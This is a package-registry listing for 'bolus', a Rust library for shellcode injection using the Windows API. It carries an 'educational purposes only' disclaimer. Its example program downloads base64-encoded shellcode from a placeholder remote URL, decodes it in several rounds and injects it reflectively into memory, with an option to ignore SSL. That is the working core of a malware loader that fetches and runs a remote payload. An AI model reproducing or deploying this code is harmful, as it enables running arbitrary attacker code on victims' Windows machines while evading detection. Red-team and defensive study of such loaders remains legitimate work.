Crates.io | bolus |
lib.rs | bolus |
version | 0.3.0 |
source | src |
created_at | 2023-06-04 18:52:05.698087 |
updated_at | 2024-09-03 03:35:40.511278 |
description | Library for shellcode injection using the Windows API |
homepage | |
repository | |
max_upload_size | |
id | 882496 |
size | 14,027 |
Library for shellcode injection using the Windows API.
WARNING: This code is for educational purposes only. The creator strongly urges you to only use this code in authorized contexts. Don't do crimes.
The following is an example implementation, which can be observed in RustyNeedle:
use bolus::{
inject,
load,
injectors::{
InjectionType,
InjectorType
}
};
/// The URL where shellcode will be downloaded from
const URL: &str = "http://1.2.3.4/note.txt";
/// The # of base64 iterations to decode
const B64_ITERATIONS: usize = 3;
/// `IgnoreSSL` switch. You know what this does.
const IGNORE_SSL: bool = false;
fn main() -> Result<(), String> {
let injector = load(
InjectorType::Base64Url((
URL.to_string(),
IGNORE_SSL,
B64_ITERATIONS
))
)?;
inject(
injector,
InjectionType::Reflect,
true
)
}
Full docs at docs.rs